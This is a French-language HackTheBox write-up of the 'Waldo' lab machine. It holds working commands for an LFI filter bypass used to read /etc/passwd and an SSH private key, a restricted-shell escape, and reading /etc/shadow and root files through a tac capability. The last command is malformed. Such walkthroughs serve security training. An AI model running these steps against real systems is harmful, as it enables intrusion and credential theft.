Waldo HackTheBox (Writeup)

Skills:

LFI (Local File Inclusion) - Filter Bypass
Obtaining a user's SSH private key through the LFI
Escaping from a container
Restricted Shell Bypass
Abusing Capabilities (cap_dac_read_search+ei) [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.87 -oG allPorts

Scan de la version des ports avec Nmap 22,80:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.10.87 -oN targeted

Exploitation du Port 80

Interception avec BurpSuite

Nous analysons les requêtes et identifions une vulnérabilité LFI (Local File Inclusion).

Test LFI basique

Nous essayons d’accéder à /etc/passwd :

../../../../etc/passwd

Cela ne fonctionne pas.

Contournement du filtre LFI

Nous testons un contournement avec

....//....//../....//..//....//etc/passwd

Ce contournement fonctionne, et nous pouvons maintenant lister le fichier /etc/passwd.

Extraction du fichier avec Curl

Nous utilisons curl pour récupérer le fichier via l'endpoint vulnérable :

curl -s -X POST http://10.10.10.87/fileRead.php -d "file=....//....//../....//..//....//etc/passwd" | jq -r '.file'

Nous trouvons l’utilisateur nobody.

Accès au répertoire `.ssh` de nobody

Nous interceptons la requête de la page list.html et constatons que la variable path est utilisée pour récupérer les fichiers.

Nous explorons le répertoire home de nobody :

....//....//../....//..//....//home/nobody/.ssh/

Nous trouvons un fichier .monitor.

Extraction de la clé privée SSH

curl -s -X POST http://10.10.10.87/fileRead.php -d "file=....//....//../....//..//....//home/nobody/.ssh/.monitor" | jq -r '.file'

Nous récupérons une clé privée.

Connexion SSH à nobody

Nous nous connectons avec la clé récupérée :

ssh [email protected] -i id_rsa

Flag user.txt :)

Pivoting User operator

Nous identifions un utilisateur operator

Nous trouvons un fichier authorized_keys appartenant à monitor.

Connexion SSH à monitor

ssh [email protected] -i .monitor

Nous nous retrouvons dans un shell restreint (rbash).

Contournement du shell restreint

Nous lançons une session SSH en spécifiant bash :

ssh [email protected] -i .monitor "bash --noprofile"

Élévation de Privilèges

Capabilities- Tac

Nous listons les fichiers avec des capacités spécifiques :

getcap -r / 2>/dev/null

Nous identifions que tac dispose de la capacité cap_dac_read_search+ei :

Exploitation de tac pour lire les fichiers protégés

La commande tac (inverse de cat) nous permet de lire les fichiers en inversant leur contenu.

tac /etc/shadow

Flag root.txt :)

Lecture du flag root.txt

tac /root/root.txt | tac

Récupération de la clé SSH root

/usr/bin/tac | /root/.ssh/id_rsa | /usr/bin/tac

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?